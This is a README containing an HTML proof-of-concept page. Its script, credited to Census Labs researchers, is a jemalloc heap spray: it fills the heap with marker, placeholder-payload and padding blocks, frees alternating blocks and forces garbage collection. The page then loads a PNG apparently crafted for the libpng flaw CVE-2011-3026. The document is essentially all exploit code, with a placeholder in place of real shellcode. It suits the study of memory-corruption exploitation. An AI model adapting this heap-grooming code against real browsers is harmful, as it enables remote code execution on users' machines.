README.md
Rendering markdown...
<html>
<head>
<script>
function jemalloc_spray(blocks, size)
{
// Copyright (c) 2012 Patroklos Argyroudis <argp at domain census-labs.com>
// Copyright (c) 2012 Chariton Karamitas <huku at domain census-labs.com>
// Copyright (c) 2012 Census, Inc. (http://www.census-labs.com/)
var block_size = size / 2;
// rop/bootstrap/whatever
var marker = unescape("%ubeef%udead");
marker += marker;
// shellcode/payload
var content = unescape("%u6666%u6666");
while(content.length < (block_size / 2))
{
content += content;
}
var arr = [];
for(i = 0; i < blocks; i++)
{
// construct the random block padding (corelanc0d3r's trick)
var rnd1 = Math.floor(Math.random() * 1000) % 16;
var rnd2 = Math.floor(Math.random() * 1000) % 16;
var rnd3 = Math.floor(Math.random() * 1000) % 16;
var rnd4 = Math.floor(Math.random() * 1000) % 16;
var rndstr = "%u" + rnd1.toString() + rnd2.toString();
rndstr += "%u" + rnd3.toString() + rnd4.toString();
var padding = unescape(rndstr);
while(padding.length < block_size - marker.length - content.length)
{
padding += padding;
}
// construct the block
var block = marker + content + padding;
// if required repeat the block
while(block.length < block_size)
{
block += block;
}
// spray block
arr[i] = block.substr(0);
}
// for debugging
Math.asin(1);
for(i = 0; i < blocks; i += 2)
{
delete(arr[i]);
arr[i] = null;
}
var ret = trigger_gc();
alert("After garbage collection: " + ret.length);
// for debugging
Math.atan2(6, 6);
return arr;
}
function trigger_gc()
{
var gc = [];
for(i = 0; i < 100000; i++)
{
gc[i] = new Array();
}
return gc;
}
// 1000 spray blocks of size 630 (target run size: 1024)
var foo = jemalloc_spray(1000, 630);
// alert(foo.length);
</script>
</head>
<body>
CVE-2011-3026 is fun
<p><img src="cve-2011-3026.png">
</body>
</html>